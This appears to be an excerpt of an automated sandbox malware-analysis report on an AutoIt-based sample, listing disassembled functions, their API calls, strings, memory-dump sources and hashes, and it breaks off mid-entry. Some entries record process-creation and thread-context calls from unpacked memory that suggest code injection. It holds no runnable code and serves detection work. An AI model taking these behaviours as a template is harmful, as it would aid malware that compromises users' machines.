String ID: TaskbarCreated$%I
API String ID: 129472671-1195164674
Opcode ID: d085891fbce4ac700e19f77706549dbb7e8c65c9ecaa69f5eff41dbd37e5b37c
Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
Opcode Fuzzy Hash: d085891fbce4ac700e19f77706549dbb7e8c65c9ecaa69f5eff41dbd37e5b37c
Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

Function 00403A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403A50
LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
LoadIconW.USER32(00000063), ref: 00403A76
LoadIconW.USER32(000000A4), ref: 00403A88
LoadIconW.USER32(000000A2), ref: 00403A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
RegisterClassExW.USER32(?), ref: 00403B16

Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101

Strings

AutoIt v3, xrefs: 00403B05
0, xrefs: 00403AF4
#, xrefs: 00403AFB

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88

Function 00ADCE90 Relevance: 16.2, APIs: 10, Instructions: 1203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408264425.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 311230be48adb5367ad716dbdf4c5b8017d1cf17239e38096d4b6c40087f10fb
Instruction ID: a08d02b963e2047860f6a9b1837983c4389cf99dd1a2f50975e91a3ec4d64ecf
Opcode Fuzzy Hash: 311230be48adb5367ad716dbdf4c5b8017d1cf17239e38096d4b6c40087f10fb
Instruction Fuzzy Hash: 54A2BE7150D3818FC735CB18C8447AABBE1AFD5328F498A5FE09A97392D735A904CB93

Function 00403766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/ErrorStdOut, xrefs: 0040387D
/AutoIt3OutputDebug, xrefs: 00403892
/AutoIt3ExecuteScript, xrefs: 004038BC
CMDLINERAW, xrefs: 004037FB
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 004037AE
CMDLINE, xrefs: 00403822
/AutoIt3ExecuteLine, xrefs: 004038A7
RL, xrefs: 0043D213

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
API String ID: 1825951767-3937808951
Opcode ID: bf729bc036ab1e3317ed16226f5a6ba2ab3dbb3ff9daeb18d2562a5e898344aa
Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
Opcode Fuzzy Hash: bf729bc036ab1e3317ed16226f5a6ba2ab3dbb3ff9daeb18d2562a5e898344aa
Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9

Function 0040F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1

Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
OleInitialize.OLE32(00000000), ref: 0040FA4A
CloseHandle.KERNEL32(00000000), ref: 004445C8

Strings

<WL, xrefs: 0040F930
SL, xrefs: 0040F7EB
\TL, xrefs: 0040F7F7
%I, xrefs: 0040F796, 0040F7A8, 0040F96E, 0040FA51

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <WL$\TL$%I$SL
API String ID: 1986988660-4199584472
Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

Function 00E87DD0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E87EA1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E880C7

Memory Dump Source

Source File: 00000000.00000002.1409377799.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e85000_I3LPkQh2an.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: 502e0b6f2724db1d4146de2f10edcf8a0acf9a26015b7e4b88f099e8cf2929b4
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: 8DA11970E04209EBEB14DFA4C994BEEB7B5FF48304F209159E609BB280DB759E84DB54

Function 004039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
ShowWindow.USER32(00000000,?,?), ref: 00403A38
ShowWindow.USER32(00000000,?,?), ref: 00403A41

Strings

edit, xrefs: 00403A1E
AutoIt v3, xrefs: 004039FB, 00403A00, 00403A01

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

Function 00E87B90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E87A80: Sleep.KERNEL32(000001F4), ref: 00E87A91

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E87CBD

Strings

0TOG5A2EM2N0AXUC3H8, xrefs: 00E87D20, 00E87D23

Memory Dump Source

Source File: 00000000.00000002.1409377799.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e85000_I3LPkQh2an.jbxd

Similarity

API ID: CreateFileSleep
String ID: 0TOG5A2EM2N0AXUC3H8
API String ID: 2694422964-2068012696
Opcode ID: 82cd89d1499e69f08d99ebea5eaed76e4a3dda64ac53d4e0330c7f6662434e40
Instruction ID: d5eb37abebdda1e289e8bbeb86c17a62bd119fa7a78ff74c23dd6f976f3aec5e
Opcode Fuzzy Hash: 82cd89d1499e69f08d99ebea5eaed76e4a3dda64ac53d4e0330c7f6662434e40
Instruction Fuzzy Hash: 7A51A170D08248EAEF11DBF4C814BEEBBB9AF15304F104199E64CBB2C1D6B94B44CBA5

Function 0040407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

_memset.LIBCMT ref: 004040FC
_wcscpy.LIBCMT ref: 00404150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160

Strings

Line: , xrefs: 0043D400

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
Opcode Fuzzy Hash: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F

Function 00E86A80 Relevance: 8.2, APIs: 5, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 00E8723B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E872D1
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00E872F3

Memory Dump Source

Source File: 00000000.00000002.1409377799.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e85000_I3LPkQh2an.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
Instruction ID: 4718fc0ba92822cb26208e4412dd50188986307385f7c104602f8c0257f35253
Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
Instruction Fuzzy Hash: EB620B30A14658DBEB24DFA4C850BDEB372EF58304F2091A9D50DFB2A0E7759E81CB59

Function 0040686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F

_free.LIBCMT ref: 0043E263
_free.LIBCMT ref: 0043E2AA

Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD

Strings

Bad directive syntax error, xrefs: 0043E292
>>>AUTOIT SCRIPT<<<, xrefs: 0043E039

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: d76785ac015817b771e0c92402641700af4005d1542243439f3d4eb097ccf105
Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
Opcode Fuzzy Hash: d76785ac015817b771e0c92402641700af4005d1542243439f3d4eb097ccf105
Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59

Function 004035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617

Strings

Control Panel\Mouse, xrefs: 004035D2

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768

Function 0046955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD

Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837

_free.LIBCMT ref: 004696A2
_free.LIBCMT ref: 004696A9
_free.LIBCMT ref: 00469714

Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B

_free.LIBCMT ref: 0046971C

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59

Function 0042470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004247A0
__flush.LIBCMT ref: 004247C0
__write.LIBCMT ref: 004247F3
__flsbuf.LIBCMT ref: 00424821

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48

Function 00ADB180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00ADB2BA
WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00ADB2E0

Memory Dump Source

Source File: 00000000.00000002.1408264425.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_I3LPkQh2an.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 798ae18b21d7488220b83a15ff29e0f047c6672e49b4271152b4a18f84283056
Instruction ID: c9d395984e5d0f6384bee3bba2addae4e00478f43e14e9970d8a14477f651f23
Opcode Fuzzy Hash: 798ae18b21d7488220b83a15ff29e0f047c6672e49b4271152b4a18f84283056
Instruction Fuzzy Hash: BD318F7542C380EED7118B25881576FBFE06B92B14F8A854FE4968A791D3B4890897B3

Function 004044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004044CF

Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160

KillTimer.USER32(?,00000001,?,?), ref: 00404524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49

Function 00404C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00404CBA

Strings

AU3!P/I, xrefs: 00404CB4
EA06, xrefs: 0043D8CC

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/I$EA06
API String ID: 4104443479-1914660620
Opcode ID: a4a93ea115200c971a8861d8d6b54e97b5cb82f41a73f581a0e127d2f66012de
Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
Opcode Fuzzy Hash: a4a93ea115200c971a8861d8d6b54e97b5cb82f41a73f581a0e127d2f66012de
Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA

Function 00407285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043EA39
